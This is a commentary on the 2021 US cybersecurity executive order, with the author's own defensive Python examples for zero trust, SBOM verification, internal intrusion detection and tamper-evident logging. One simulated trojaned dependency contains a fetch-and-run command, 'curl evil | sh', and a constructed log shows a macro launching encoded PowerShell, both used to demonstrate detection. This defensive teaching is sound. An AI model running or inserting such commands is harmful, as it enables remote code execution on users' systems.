The President of the United States has issued an executive order concerning cybersecurity. https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/
This is my rapid-response analysis.
The order was undoubtedly in preparation for a considerable amount of time, but it was released following the ransomware attack on the Colonial Pipeline in the US, which carries petroleum products along most of the East Coast.
Technically, the executive order binds only federal agencies and, through their procurement rules, the contractors that sell to them, but many of its provisions reach the entire supply chain leading up to those directly specified customers. As a result, most of the orders will affect, to varying degrees, any company that does business with a government contractor as well as any government contractor or supplier. An executive order cannot compel companies that are not government contractors to change what they do, but those that do not comply may be excluded from doing business with the government and any of its contractors or suppliers, so in effect it applies to almost all companies.
The executive order is intended to do several things:
· Remove barriers to sharing threat information, primarily between the government and private entities, but it will also have the effect of making it easier to share information among private entities.
· Strengthen cybersecurity standards.
· Mandate the wider use of zero-trust methods and architectures.
· Require software developers to maintain greater visibility into their software.
· Make security information public so that consumers can evaluate the security of a software system; to that end it calls for an “Energy Star”-like program for rating software security.
· Mandate the use of multi-factor authentication where appropriate.
· Strengthen the requirements around encryption at rest and for data in motion.
· Establish a cybersecurity review board (the Cyber Safety Review Board).
· Create a standard playbook for responding to cyber-incidents. I predict that this will end up being a mandate that each company have a standard procedure for dealing with cyber-incidents.
· Improve capabilities to detect cybersecurity incidents.
· Improve investigative and remediation capabilities.
Analysis
The order provides a lot of common sense ideas for how to improve cybersecurity—common sense, that is, if you spend your time thinking about cybersecurity.
Nothing in the order seems outlandish or overly burdensome. Cybersecurity is the grand challenge of the 21st Century, and it is increasingly obvious that we need to pay a lot more attention to it. Cybersecurity failures are expensive and highly damaging to the reputations of the organizations that are attacked.
The order discusses removing the contractual barriers that prevent companies from sharing information about cyberattacks. Strictly, these are only the barriers in US federal contracts, but there will be increasing pressure to share information among all concerned parties. Under the order, service providers must promptly report information relevant to cyber incidents or potential incidents to the relevant government agencies, using industry-recognized formats. The extent of sharing will certainly increase, but it will still require a careful balance among business interests, privacy, and coordinated defense.
The focus of the order is to bring systems up to modern cybersecurity standards. NIST, the National Institute of Standards and Technology, has been very active in creating these standards. Organizations may need to review their security practices to be sure that they meet current standards, and I would expect that future standards will be developed that require additional investment. The order states an intention to invest in technology and personnel to match the modernization goals; it will require congressional action, however, to actually fund these good intentions.
The order mandates transitioning to Zero Trust Architecture, which it defines as “a set of system design principles, and a coordinated cybersecurity and system management strategy based on an acknowledgement that threats exist both inside and outside traditional network boundaries.” Under this model users get full access, but only to the bare minimum of resources they need to perform their jobs. Traditional security architectures concentrated their effort on defending the perimeter of a network: once through the firewall, an attacker had essentially free rein, because every machine inside the firewall was treated as trusted. Zero Trust Architecture reverses that assumption. Every request is treated as untrusted, no matter where it originates, until the identity making it, the device it comes from, and its permission to reach that specific resource have all been verified.
Defenders have to defend their systems correctly every time, but attackers need only succeed once. It is no longer a question of whether attackers will pierce the firewall, but when and how they will find a way to do it. Internal as well as perimeter defenses are therefore necessary, and Zero Trust Architectures provide a framework for that internal-plus-perimeter protection.
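To make the contrast concrete, here is an added example (my own illustration, not code from the order or from any product) of the two access decisions applied to the same requests. The network range, the resource policy table and the two requests are constructed for the example; the point is that the perimeter rule admits an attacker who has landed on an internal host, while the per-request rule admits a legitimate remote user and refuses the foothold regardless of its source address.

```python
"""Added example: perimeter-style versus zero-trust access decisions.
Everything below (network range, policy table, users, hosts) is constructed."""
import ipaddress
from dataclasses import dataclass
from typing import Tuple, Set

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")  # assumed corporate address range

# Constructed policy: which roles may reach a resource, and what assurance
# level (MFA, managed and patched device) that resource demands.
POLICY = {
    "payroll-db":   {"roles": {"finance"},        "mfa": True,  "managed_device": True},
    "wiki":         {"roles": {"finance", "eng"}, "mfa": False, "managed_device": False},
    "build-server": {"roles": {"eng"},            "mfa": True,  "managed_device": True},
}

@dataclass
class Request:
    user: str
    roles: Set[str]
    src_ip: str
    resource: str
    mfa_verified: bool = False
    device_managed: bool = False
    device_patched: bool = True
    token_valid: bool = True

def perimeter_decision(req: Request) -> bool:
    """The traditional model: an internal source address is trusted outright."""
    return ipaddress.ip_address(req.src_ip) in INTERNAL_NET

def zero_trust_decision(req: Request) -> Tuple[bool, str]:
    """Evaluate every request on its own merits; source location is never consulted.
    Returns (allowed, reason) so that a denial can be logged and investigated."""
    rule = POLICY.get(req.resource)
    if rule is None:
        return False, "unknown resource (default deny)"
    if not req.token_valid:
        return False, "identity not verified"
    if rule["mfa"] and not req.mfa_verified:
        return False, "resource requires MFA"
    if rule["managed_device"] and not (req.device_managed and req.device_patched):
        return False, "device posture insufficient"
    if not (req.roles & rule["roles"]):
        return False, f"user lacks a role permitted for {req.resource}"
    return True, "allowed: identity, device and authorization verified"

def compare(req: Request) -> dict:
    allowed, reason = zero_trust_decision(req)
    return {"perimeter": perimeter_decision(req), "zero_trust": allowed, "reason": reason}

if __name__ == "__main__":
    # Constructed requests: an attacker's foothold on an internal workstation
    # using a service account, and a finance user working from a home network.
    foothold = Request(user="svc-print", roles={"eng"}, src_ip="10.20.3.7",
                       resource="payroll-db", device_managed=True)
    remote_cfo = Request(user="alice", roles={"finance"}, src_ip="203.0.113.5",
                         resource="payroll-db", mfa_verified=True, device_managed=True)
    for r in (foothold, remote_cfo):
        print(r.user, compare(r))
```

The decision function deliberately returns the reason for a denial: in a zero-trust deployment the denials from internal addresses are exactly the events a detection team wants to see.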
The order requires new documentation and compliance frameworks. These may impose additional requirements on how companies document their processes and products.
One of the most impactful features of the new order is its focus on preventing supply chain attacks. It requires software that can resist attacks and detect tampering. Each provider will be required to verify that its software has not been compromised, including the software used for development and deployment as well as the components it incorporates. The government, with the involvement of the relevant parties, will develop guidelines for evaluating software security, including the practices of developers and suppliers, and these parties will need to demonstrate their conformance with secure practices. The guidelines are expected to include (quoting from the order):
(i) secure software development environments, including such actions as:
(A) using administratively separate build environments;
(B) auditing trust relationships;
(C) establishing multi-factor, risk-based authentication and conditional access across the enterprise;
(D) documenting and minimizing dependencies on enterprise products that are part of the environments used to develop, build, and edit software;
(E) employing encryption for data; and
(F) monitoring operations and alerts and responding to attempted and actual cyber incidents;
(ii) generating and, when requested by a purchaser, providing artifacts that demonstrate conformance to the processes set forth in subsection (e)(i) of this section;
(iii) employing automated tools, or comparable processes, to maintain trusted source code supply chains, thereby ensuring the integrity of the code;
(iv) employing automated tools, or comparable processes, that check for known and potential vulnerabilities and remediate them, which shall operate regularly, or at a minimum prior to product, version, or update release;
(v) providing, when requested by a purchaser, artifacts of the execution of the tools and processes described in subsection (e)(iii) and (iv) of this section, and making publicly available summary information on completion of these actions, to include a summary description of the risks assessed and mitigated;
(vi) maintaining accurate and up-to-date data, provenance (i.e., origin) of software code or components, and controls on internal and third-party software components, tools, and services present in software development processes, and performing audits and enforcement of these controls on a recurring basis;
(vii) providing a purchaser a Software Bill of Materials (SBOM) for each product directly or by publishing it on a public website;
(viii) participating in a vulnerability disclosure program that includes a reporting and disclosure process;
(ix) attesting to conformity with secure software development practices; and
(x) ensuring and attesting, to the extent practicable, to the integrity and provenance of open source software used within any portion of a product.
Companies will need to provide a software bill of materials that lists every component included in the code. Modern code typically contains many components: some are purchased, some are open source, and some are developed in house. Any of those components can be the vehicle for a supply chain attack. The attacker corrupts the component during its development or build, without the producer’s knowledge; the producer then distributes the corrupt component and certifies that it genuinely comes from the producer, lulling its users into a false sense of security. An SBOM is what lets a purchaser answer quickly whether a newly reported compromised or vulnerable component is present in what they run.
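Items (iii), (iv), (vi) and (vii) of the quoted list fit together, and the following added example (my own illustration, not code from the order or from any SBOM tool) shows the mechanics in miniature: build a CycloneDX-shaped SBOM from the components actually present in a build, re-hash the build inputs against it to detect a component altered after the SBOM was produced, and match the listed components against an advisory feed. The component contents, the product name and the advisory identifier are all constructed and hypothetical.

```python
"""Added example: minimal SBOM generation, build-input verification and
known-vulnerability matching. All components and advisories are constructed."""
import hashlib
from typing import Dict, List, Tuple

# Constructed stand-ins for the dependency archives present in the build
# environment: name -> (version, bytes of the artifact as reviewed).
TRUSTED_ARTIFACTS: Dict[str, Tuple[str, bytes]] = {
    "leftpad":    ("1.3.0", b"def leftpad(s, n):\n    return s.rjust(n)\n"),
    "httpclient": ("4.2.1", b"class Client:\n    def get(self, url): ...\n"),
    "yamlparse":  ("0.9.7", b"def load(text):\n    ...\n"),
}

# Constructed advisory feed: (name, affected version) -> hypothetical advisory id.
ADVISORIES = {("yamlparse", "0.9.7"): "EXAMPLE-2021-0001 (hypothetical)"}

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def build_sbom(product: str, version: str, artifacts: Dict[str, Tuple[str, bytes]]) -> dict:
    """Produce a CycloneDX-shaped document: one component per dependency,
    identified by package URL and pinned by the SHA-256 of the artifact."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "metadata": {"component": {"name": product, "version": version}},
        "components": [
            {"type": "library", "name": name, "version": ver,
             "purl": f"pkg:pypi/{name}@{ver}",
             "hashes": [{"alg": "SHA-256", "content": sha256_hex(data)}]}
            for name, (ver, data) in sorted(artifacts.items())
        ],
    }

def verify_build_inputs(sbom: dict, artifacts: Dict[str, Tuple[str, bytes]]) -> List[str]:
    """Re-hash what is actually in the build environment and compare with the SBOM.
    A mismatch means a component changed after it was recorded; an unlisted or
    missing component means the SBOM no longer describes the build."""
    findings = []
    listed = {c["name"]: c for c in sbom["components"]}
    for name, (ver, data) in artifacts.items():
        comp = listed.get(name)
        if comp is None:
            findings.append(f"{name}=={ver}: present in build but absent from SBOM")
            continue
        if sha256_hex(data) != comp["hashes"][0]["content"]:
            findings.append(f"{name}=={ver}: hash mismatch, artifact altered since SBOM was produced")
    for name in listed:
        if name not in artifacts:
            findings.append(f"{name}: listed in SBOM but missing from build")
    return findings

def known_vulnerabilities(sbom: dict, advisories: dict) -> List[str]:
    """Match SBOM components against an advisory list by (name, version)."""
    return [f"{c['name']}=={c['version']}: {advisories[(c['name'], c['version'])]}"
            for c in sbom["components"] if (c["name"], c["version"]) in advisories]

if __name__ == "__main__":
    sbom = build_sbom("demo-product", "1.0.0", TRUSTED_ARTIFACTS)
    print("clean build findings:", verify_build_inputs(sbom, TRUSTED_ARTIFACTS))
    # Simulate a dependency replaced with a trojaned copy of the same version.
    tampered = dict(TRUSTED_ARTIFACTS)
    tampered["leftpad"] = ("1.3.0", b"import os\nos.system('curl evil | sh')\n")
    print("tampered build findings:", verify_build_inputs(sbom, tampered))
    print("advisories:", known_vulnerabilities(sbom, ADVISORIES))
```

Real SBOM tooling records more (licenses, transitive dependencies, the tool that produced the document), but the two checks shown are the ones that matter for the order's purpose: the hash ties each listed component to a specific reviewed artifact, and the advisory match is what a purchaser does with an SBOM on the day a component is reported compromised.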
The order includes an effort to build a security rating system that can be applied to IoT (Internet of Things) and other systems. This rating system is intended to mimic the Energy Star ratings and make it easy for customers (individuals and government agencies) to determine that a system has been evaluated for security and what its status is.
The order mandates the development of a standard set of procedures for dealing with cybersecurity incidents. From the private sector point of view, I expect that this mandate will end up being a requirement that each party have in place standard operating procedures for dealing with these attacks and for communicating about them with the government and the public.
An important opportunity for innovation is the mandate to improve detection of cybersecurity vulnerabilities and incidents. Right now, we are very effective at blocking malicious activity at the perimeter (e.g., at the firewall), but we have seen that not all attacks come in through the same channels. We would benefit from a capability that identifies evidence of an attack from within the network. Eventually attackers will get into the internal systems, and we will need Endpoint Detection and Response (EDR) measures to detect their presence and remove them.
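Two of the simplest forms that "evidence of an attack from within the network" takes are a single account fanning out to many hosts in a short window (lateral movement) and an office application spawning a command shell on an endpoint. The following added example (my own illustration, not code from the order or from any EDR product) runs both detections over constructed log lines; the hosts, users, timestamps and the encoded PowerShell argument are all made up for the example, and the thresholds are assumptions a real deployment would tune.

```python
"""Added example: two internal-detection rules over constructed log lines."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed authentication events: a normal user, a normal admin, and a
# service account from one workstation touching six servers in 14 seconds.
LOGON_LOG = """\
2021-05-10T09:00:01 logon user=alice src=ws-17 dst=fileserver-1 type=network
2021-05-10T09:00:09 logon user=alice src=ws-17 dst=mail-1 type=network
2021-05-10T10:15:00 logon user=svc-backup src=ws-42 dst=srv-01 type=network
2021-05-10T10:15:03 logon user=svc-backup src=ws-42 dst=srv-02 type=network
2021-05-10T10:15:05 logon user=svc-backup src=ws-42 dst=srv-03 type=network
2021-05-10T10:15:08 logon user=svc-backup src=ws-42 dst=srv-04 type=network
2021-05-10T10:15:11 logon user=svc-backup src=ws-42 dst=srv-05 type=network
2021-05-10T10:15:14 logon user=svc-backup src=ws-42 dst=srv-06 type=network
2021-05-10T11:30:00 logon user=bob src=ws-03 dst=wiki-1 type=network
"""

# Constructed process-creation events from the same endpoints.
PROCESS_LOG = """\
2021-05-10T10:14:40 process host=ws-42 parent=winword.exe child=powershell.exe args=-enc SQBFAFgA
2021-05-10T10:14:50 process host=ws-42 parent=powershell.exe child=cmd.exe args=/c whoami
2021-05-10T11:00:00 process host=ws-03 parent=explorer.exe child=chrome.exe args=
"""

def parse(line: str) -> Dict[str, object]:
    """Parse '<iso-timestamp> <kind> key=value ...'; a value may contain spaces
    (command-line arguments), so tokens without '=' extend the previous value."""
    ts, kind, *rest = line.split()
    rec: Dict[str, object] = {"ts": datetime.fromisoformat(ts), "kind": kind}
    key = None
    for tok in rest:
        if "=" in tok:
            key, val = tok.split("=", 1)
            rec[key] = val
        elif key is not None:
            rec[key] = f"{rec[key]} {tok}"
    return rec

def detect_lateral_movement(lines: List[str], window: timedelta = timedelta(minutes=5),
                            threshold: int = 5) -> List[str]:
    """Alert when one (user, source host) pair reaches at least `threshold`
    distinct destinations inside `window`: the fan-out of an attacker exploring."""
    events = sorted((parse(l) for l in lines if " logon " in l), key=lambda r: r["ts"])
    by_actor = defaultdict(list)
    for r in events:
        by_actor[(r["user"], r["src"])].append(r)
    alerts = []
    for (user, src), evs in by_actor.items():
        for i, first in enumerate(evs):
            dsts = {e["dst"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(dsts) >= threshold:
                alerts.append(f"{user}@{src} reached {len(dsts)} hosts within {window} "
                              f"starting {first['ts'].isoformat()}")
                break  # one alert per actor is enough for the analyst
    return alerts

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def detect_office_spawning_shell(lines: List[str]) -> List[str]:
    """Alert on a document-handling application launching a shell: a common
    first step of a macro or exploit payload, rarely legitimate."""
    alerts = []
    for r in (parse(l) for l in lines if " process " in l):
        if str(r["parent"]).lower() in OFFICE_APPS and str(r["child"]).lower() in SHELLS:
            alerts.append(f"{r['host']}: {r['parent']} spawned {r['child']} {r['args']}".rstrip())
    return alerts

if __name__ == "__main__":
    for a in detect_lateral_movement(LOGON_LOG.splitlines()):
        print("LATERAL:", a)
    for a in detect_office_spawning_shell(PROCESS_LOG.splitlines()):
        print("PROCESS:", a)
```

Neither rule needs a signature of the attacker's tooling, which is the point of internal detection: the perimeter never saw anything, but the behaviour on the inside is anomalous on its own terms. In practice both rules need an allow-list (backup and scanning accounts legitimately fan out; some macros legitimately call scripts) and the thresholds need baselining against the environment.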
The order is very clear that security-related logs must be protected by cryptographic methods so that their integrity can be verified. Providers may need to adjust some logging procedures to meet this requirement.
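The usual way to meet that requirement is to chain the log entries with a keyed hash, so that editing, deleting or reordering any entry breaks every tag that follows it. The following added example (my own illustration, not code from the order) shows such an append-only log with an HMAC-SHA256 chain and a verifier that reports the first entry that no longer checks out. The key and the log entries are constructed; in a real deployment the key lives in a KMS or HSM, never on the host that writes the log.

```python
"""Added example: an HMAC-chained append-only audit log with tamper detection.
The key and the entries are constructed for the example."""
import hashlib
import hmac
from typing import List, Tuple

# Constructed key. In production this is held by a separate signing service.
LOG_KEY = b"constructed-demo-key-do-not-use"
GENESIS = "genesis"  # tag value that anchors the first entry

def _tag(key: bytes, prev_tag: str, seq: int, entry: str) -> str:
    """Tag = HMAC(key, previous tag || sequence number || entry text).
    Binding the previous tag is what makes the chain order-sensitive."""
    msg = f"{prev_tag}|{seq}|{entry}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

def append(log: List[dict], entry: str, key: bytes = LOG_KEY) -> List[dict]:
    prev = log[-1]["tag"] if log else GENESIS
    seq = len(log)
    log.append({"seq": seq, "entry": entry, "tag": _tag(key, prev, seq, entry)})
    return log

def verify(log: List[dict], key: bytes = LOG_KEY) -> Tuple[bool, int]:
    """Recompute the chain. Returns (True, -1) when intact, otherwise
    (False, index) for the first entry whose sequence number or tag is wrong."""
    prev = GENESIS
    for i, rec in enumerate(log):
        if rec["seq"] != i:
            return False, i
        expected = _tag(key, prev, i, rec["entry"])
        if not hmac.compare_digest(expected, rec["tag"]):
            return False, i
        prev = rec["tag"]
    return True, -1

def demo() -> Tuple[bool, int]:
    """Write four constructed entries, then delete the one an intruder would
    most want gone, and report what the verifier says."""
    log: List[dict] = []
    for e in ["user=alice action=login result=ok",
              "user=alice action=read file=payroll.xlsx",
              "user=alice action=privilege_escalation result=ok",
              "user=alice action=logout"]:
        append(log, e)
    assert verify(log) == (True, -1)
    del log[2]
    return verify(log)

if __name__ == "__main__":
    print("after deleting entry 2:", demo())
```

Two caveats a practitioner will want. First, the chain cannot detect truncation of the most recent entries on its own; the latest tag has to be anchored somewhere the attacker cannot reach, for instance forwarded to a remote collector or timestamped periodically. Second, if the attacker has the key they can rewrite the chain, which is why the key is kept off the logging host and why an asymmetric signature (private key in an HSM, public key with the auditors) is the stronger design for logs that outsiders must be able to verify.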
Conclusion
Overall, many of the mandates of this order involve features that are already known or are in development. The mandates for how suppliers develop and deliver software are likely to be the most impactful. If nothing else, this order highlights the need for enhanced cybersecurity, which should make it easier to persuade organizations of the importance of these measures.